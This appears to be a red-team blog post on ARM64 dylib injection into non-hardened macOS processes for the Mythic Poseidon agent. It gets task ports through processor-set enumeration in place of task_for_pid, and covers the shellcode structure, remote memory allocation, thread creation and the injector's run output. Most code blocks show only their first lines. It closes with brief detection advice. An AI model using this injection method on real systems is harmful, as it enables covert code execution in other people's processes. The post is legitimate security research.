ARM-ed and Dangerous: Dylib Injection on macOS
Aug 21 2025
By: West Shepherd • 24 min read
Modern Dylib Injection Techniques for AArch64 macOS
TL;DR This post details how I extended the Mythic Poseidon agent to support ARM64 Dylib injection on Apple Silicon. The method leverages Mach APIs to enumerate processor sets, obtain task ports, and inject ARM64 shellcode that loads dynamic libraries (i.e., Dylibs) into non-hardened macOS processes. Full technical details are provided, including shellcode construction, memory allocation, runtime patching, and thread creation. Readers will gain insight into working around task_for_pid()
restrictions with processor set enumeration and how defenders can detect these techniques in the wild.
Introduction
Modern macOS security controls have significantly raised the bar for process injection. Features like System Integrity Protection (SIP), Hardened Runtime, and Pointer Authentication Codes (PAC) enforce restrictions that block most familiar techniques. These defenses make it nearly impossible to inject into hardened applications, yet one method remains effective for certain non-hardened targets. Dylib injection using Mach ports still offers a practical approach under specific conditions.
In this post, I share how I extended the Poseidon agent for Mythic to support Dylib injection in Apple Silicon. The original macOS agent only included Dylib injection functionality for Intel AMD64 platforms. To achieve parity on AArch64, I implemented the same exploit logic and developed a shellcode stager in ARM64 assembly. This journey explores the technical details, from understanding the Mach API to implementing the injection process step by step.
The Dylib Injection Technique
Before diving into the specifics of ARM64 support, it is important to revisit the core concept of Dylib injection. This technique enables dynamic modification of a running process by loading an external shared library into its memory space.
The injection process involves three primary steps: memory allocation within the target process, creating a new thread, and deploying shellcode that carries out the actual loading of the Dylib. While these steps are similar to Poseidon’s AMD64 implementation, adding ARM64 support introduced new challenges, particularly around architectural differences and calling conventions.
With this foundation established, we can now examine the Mach primitives that make this possible on macOS.
Understanding the Mach Context
The Mach kernel forms the backbone of macOS process management. It provides abstractions like tasks and ports that enable inter-process communication and memory manipulation. A task represents a kernel-level execution environment for a process and ports are kernel-managed communication channels for exchanging messages.
To perform Dylib injection, we need access to the target task’s port. The task_for_pid()
API was historically the go-to solution for obtaining this access. However, SIP now enforces strict limitations, allowing its use only by processes with specific entitlements and Apple signatures.
Instead, we leverage a less common approach. By using host-level privileges, we can enumerate processor sets and retrieve task ports indirectly. This method avoids SIP’s direct enforcement while enabling the use of functions like mach_vm_write()
and thread_create_running()
later in the injection process.
Having outlined the necessary Mach context, the next step is to prepare a suitable environment for building and testing the injection logic.
Environment and Setup
If you already have an environment setup, feel free to skip to the next section
Developing and testing this injection technique requires a controlled environment. For this walkthrough, I used a Mac mini running macOS 15 (Sequoia). SIP was enabled to simulate realistic conditions, and Gatekeeper was temporarily disabled to allow testing of unsigned binaries.However, it’s worth noting that Gatekeeper will allow ad-hoc signed binaries to run if they are signed locally on the macOS system, which can be a safer alternative to disabling Gatekeeper entirely (e.g., codesign -f -s - ./binary
).
The setup also requires Xcode, along with Homebrew’s binutils and coreutils packages. Root access is necessary throughout the process to perform operations like memory allocation and thread creation in a remote process.
With the environment ready, we can move on to creating a test Dylib that serves as the payload for injection.
Creating the Test Dylib
The test Dylib provides a simple way to confirm successful injection. Its purpose is to perform an observable action upon loading, verifying that the injection worked as intended. The following code defines inject_dylib.c
.
#include <stdio.h> |
Compile the Dylib using the following clang command.
admin@[libinject]> clang -shared \ -o inject_dylib.dylib inject_dylib.c \ -framework Foundation \ -arch arm64 -fPIC |
With the Dylib compiled, we need a target process for testing the injection.
Creating a Persistent Test Process
To simplify testing, we will create a lightweight application named inject_target.c
. This application runs indefinitely, making it an ideal target for demonstrating injection.
#include <stdio.h> |
Next, compile the test application.
admin@[libinject]> clang -o inject_target inject_target.c admin@[libinject]> file inject_target inject_target: Mach-O 64-bit executable arm64 |
With both the test Dylib and target process prepared, we can now explore the ARM64 shellcode that performs the actual injection.
ARM64 Shellcode
This shellcode replicates Poseidon’s AMD64 functionality for Apple Silicon. It carries out three operations entirely in memory: spawning a new thread, loading the Dylib, and terminating the thread.
The shellcode was written in ARM64 assembly to account for architectural differences such as register usage and calling conventions. Let’s break it down step by step.
Shellcode Breakdown
The ARM64 shellcode begins with a prologue that prepares the stack and preserves critical registers. This setup ensures that subsequent operations maintain proper alignment and do not disrupt the calling conventions of the target process.
.global _main |
Thread Creation
After setting up the stack, the shellcode prepares arguments for pthread_create_from_mach_thread()
. This function creates a new thread within the target process. The thread executes a secondary routine called _start_routine
.
; === Prepare Arguments for pthread_create_from_mach_thread === |
After creating the thread, the shellcode enters an infinite loop. This prevents the main thread from returning and allows the injected thread to execute independently.
_jump: |
The _start_routine
function carries out the actual work of loading the Dylib. It calls dlopen()
to load the specified library, then terminates cleanly using pthread_exit()
.
_start_routine: |
To support dynamic behavior, we will utilize the data section to store the shellcode placeholders PTHRDCRT
, DLOPEN__
, PTHREXIT__
, and LIBLIBLIB
. These are patched at runtime with resolved function addresses and the actual Dylib path.
; === Data Section === |
With the shellcode logic understood, we can now examine how it is compiled and integrated into the injection process.
Generating Shellcode Bytes
After authoring the shellcode, it must be compiled and converted into a format that the injection code can use. The following commands assemble the shellcode, link it into a binary, extract raw bytes, and format them as a C-compatible array.
admin@[libinject]> as -arch arm64 shellcode.asm -o shellcode.o && \ |
This process produces a flat text file of hexadecimal opcodes. These opcodes are imported into the C code as a static template called shellcode_template
.
By using a template that is copied and patched during each injection, we avoid reusing modified shellcode. Reuse could lead to corrupted placeholders and unpredictable results.
Implementing the Shellcode in C
The final product is the C shellcode array shellcode_template
, which serves as a base for the injection payload. It contains the compiled ARM64 opcodes, along with placeholder strings for function pointers and the Dylib path.
char shellcode_template[] = |
During runtime, the injector searches for these placeholders in memory and replaces them with actual addresses and strings. This ensures the shellcode operates correctly within the target process.
Having covered the shellcode implementation, we can now shift focus to the injection process itself.
Dylib Injection Exploit Code
Replicating Task for PID
The injection routine (libinject_darwin_arm64.c
) begins with the challenge of obtaining a task port for the target process. Since SIP blocks task_for_pid()
unless the binary has Apple entitlements, the injector uses a custom task_for_pid_wrapper()
function. This function takes an indirect approach, relying on processor set enumeration and host-level privileges to retrieve task ports.
Obtaining the Host Privileged Port
The first step is to retrieve the host privileged port using host_get_host_priv_port()
. This port is required for advanced Mach-based system queries and is only available to processes running as root or signed with specific entitlements — such as com.apple.private.kernel.system-task-access
, com.apple.private.mach-priv
, or com.apple.system-task-ports
.
host_t host_priv; |
Getting the Default Processor Set
Processor sets are kernel objects that group CPUs and their associated tasks. Once the host privileged port is available, the injector calls processor_set_default()
to obtain a handle to the system’s default processor set.
mach_port_t ps_default; |
Enumerating Processor Sets
The injector then uses host_processor_sets()
to retrieve a list of all processor sets on the system. This enumeration provides entry points for later task enumeration.
processor_set_name_array_t *psets = malloc(1024); |
Obtaining Privileges Over the Processor Set
To enumerate the tasks within a processor set, the injector calls host_processor_set_priv()
to request control access to the default processor set. This step is critical because it enables the use of processor_set_tasks()
.
mach_port_t ps_default_control; |
Retrieving All Task Ports
With control access granted, the injector uses processor_set_tasks()
to obtain an array of task ports for all processes in the system. Unlike task_for_pid()
, this method is not subject to SIP’s direct enforcement.
mach_msg_type_number_t num_tasks; |
The tasks array now contains task ports for every process.
Matching the Target Process
The injector iterates over the retrieved task ports and uses pid_for_task()
to compare each task’s PID to the target PID. When a match is found, the corresponding task port is returned.
for (int i = 0; i < num_tasks; i++) { |
This sequence effectively replicates the functionality of task_for_pid()
without requiring Apple’s entitlements.
Why This Approach Works Despite SIP
Although SIP blocks task_for_pid()
for protected processes, it does not impose equivalent restrictions on querying processor sets. By first obtaining host privileges, the injector accesses a more permissive control path to enumerate tasks and identify the one associated with the target PID.
This method does not bypass SIP entirely. Instead, it exploits the fact that processor set APIs remain exposed to processes running as root.
Mach-O Manipulation
With the task port for the target process secured, the next phase focuses on preparing the memory space for the injection payload. This involves allocating memory regions within the target process, configuring them appropriately, and writing the ARM64 shellcode. Proper alignment and protection settings are critical here to avoid crashing the target or triggering security mechanisms.
Allocating Memory in the Target Process
Once the target task port is obtained, the injector allocates memory in the remote process. Two regions are allocated: one for the shellcode and one for the thread’s stack. Both allocations use mach_vm_allocate()
with the VM_FLAGS_ANYWHERE
flag, allowing the kernel to select suitable addresses.
mach_vm_address_t remote_stack = 0; |
The allocated stack is sized at 0x4000 bytes, which is sufficient for the minimal operations the injected thread performed.
Resolving Function Addresses
The injector resolves the addresses of critical functions at runtime. These functions include pthread_create_from_mach_thread()
, dlopen()
, and pthread_exit()
. Resolved pointers are later used to patch the placeholders in the shellcode template.
uint64_t addr_of_pthread = (uint64_t)dlsym( |
If any of these lookups fail, the injector aborts to avoid corrupting the remote process with invalid addresses.
Patching the Shellcode Template
With function addresses resolved, the injector allocates a fresh copy of the shellcode_template
array, then searches for placeholders within the array. Each placeholder is replaced with the corresponding function pointer or the full path to the target Dylib.
size_t shellcode_size = sizeof(shellcode_template); |
This dynamic patching ensures that the shellcode has accurate references for the current process and Dylib being injected.
Writing the Shellcode to the Target Process
After patching, the injector writes the modified shellcode into the allocated memory region of the target process using mach_vm_write()
.
printf("[+] Writing shellcode to memory\n"); |
Set Memory Protections for Execution and Stack Use
To prepare the shellcode for execution, the memory protections of the code and stack regions update. The code region is marked read and execute (RX), while the stack region is set to read and write (RW).
printf("[+] Setting code region to RX permissions\n"); |
These protections are critical because macOS blocks executing shellcode from a writable memory region on hardened processes.
Launching the Remote Thread
The final step involves creating a new thread in the target process that begins execution at the shellcode entry point. This is done using thread_create_running()
.
printf("[i] Setting remote registers\n"); |
At this point, the new thread is active within the target process and executes the ARM64 shellcode, which spawns another thread to load the Dylib.
Payload Execution
With the injection routine in place, the next step is to test it against the persistent test process. Start by launching the target application in the background. This process will run indefinitely, waiting for the injection to occur.
admin@[libinject]> ./inject_target & [4] 79530 admin@[libinject]> [+] Test process started. PID: 79530 |
Once the target process is running, compile then invoke the injector binary as root. Pass the process ID (PID) of the target application and the full path to the test Dylib.
The injector will display status messages as it progresses through key stages such as task port acquisition, memory allocation, shellcode patching, and thread creation.
admin@[libinject]> clang libinject_darwin_arm64.c -framework Foundation \ [+] Running libinject_darwin_arm64 [+] Got task=8195 for pid=79530[+] Stack allocated at address: 0x1025c0000 [+] Code allocated at address: 0x1025d0000 [+] Patching shellcode [+] Patched pthread_create_from_mach_thread() with address: 0x187d39b28 [+] Patched dlopen() with address: 0x187d404f4 [+] Patched pthread_exit() with address: 0x187d35954 [+] Patched library with path: /tmp/inject_dylib.dylib [+] Shellcode patched[+] Writing shellcode to memory [+] Shellcode written to address: 0x1025d0000 [+] Setting code region to RX permissions [+] Setting stack region to RW permissions [i] Setting remote registers [+] Spawning thread [+] Finished injecting into pid=79530 with dylib=/tmp/inject_dylib.dylib [+] Injection successful! admin@[libinject]> [+] Successfully injected into process! the PID: 79530 |
After the injection completes, confirm that the test Dylib executed successfully by checking for the artifact its constructor created.
admin@[libinject]> ls /tmp/injected_success/tmp/injected_success |
If the file exists, it confirms that the Dylib was loaded into the target process and executed as intended.
Detection
Although this injection technique avoids using task_for_pid()
and does not leave shellcode binaries on disk, it is not fully stealthy. The injected Dylib must exist on disk for dlopen()
to load it. This requirement creates opportunities for defenders to detect unauthorized activity.
Apple’s Hardened Runtime and SIP protections already block unsigned Dylibs from loading into hardened processes. Ensuring these defenses are enabled, along with enforcing strict code signing policies, provides strong mitigation against this technique.
Conclusion
ARM64 Dylib injection on macOS demonstrates both the power of Mach APIs and the persistent challenges of securing dynamic operating systems. Apple’s ongoing improvements to SIP and code signing raised the bar for attackers, but non-hardened applications remain exposed.
For red team operators, this technique provides a practical method of gaining code execution on non-hardened targets in Apple Silicon environments. For defenders, understanding the mechanics of this injection process is essential to detecting and mitigating similar threats in the wild.
Shout Out
Special thanks to Angelo DeLuca and Erhad Husovic from NSoft for their excellent work on the ReverseApple project, which provided valuable insight into ARM64 injection techniques. Additional credit goes to Leo Pitt for the blog post “Dylib Loads that Tickle Your Fancy,” Cody Thomas, and to Chris Ross for his foundational work on the Poseidon agent. Their contributions helped shape the direction of this research.
References / Resources
- L. Pitt, “Dylib Loads That Tickle your Fancy,” SpecterOps, Aug. 2022. [Online]. Available: https://posts.specterops.io/dylib-loads-that-tickle-your-fancy-d25196addd8c
- Apple Inc., “Apple Developer Documentation.” [Online]. Available: https://developer.apple.com/documentation/
- Apple Inc., “Mach-O Programming Guide.” [Online]. Available: https://developer.apple.com/library/archive/documentation/
- W. Shepherd, “libinject_darwin_arm64.c,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/f792cac61a1b51d3d96ade6a917819ff
- W. Shepherd, “libinject_darwin_arm64.h,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/cfcb9ecf7f9e2aa96e5884a0526ccba7
- Mythic – Poseidon Agent on AMD64 macOS, SpecterOps. [Online]. Available: https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agent_code/libinject/libinject_darwin_amd64.c
- A. DeLuca and E. Husovic, “inject_aarch64,” NSoft, GitHub Repository, 2023. [Online]. Available: https://github.com/ReverseApple/inject_aarch64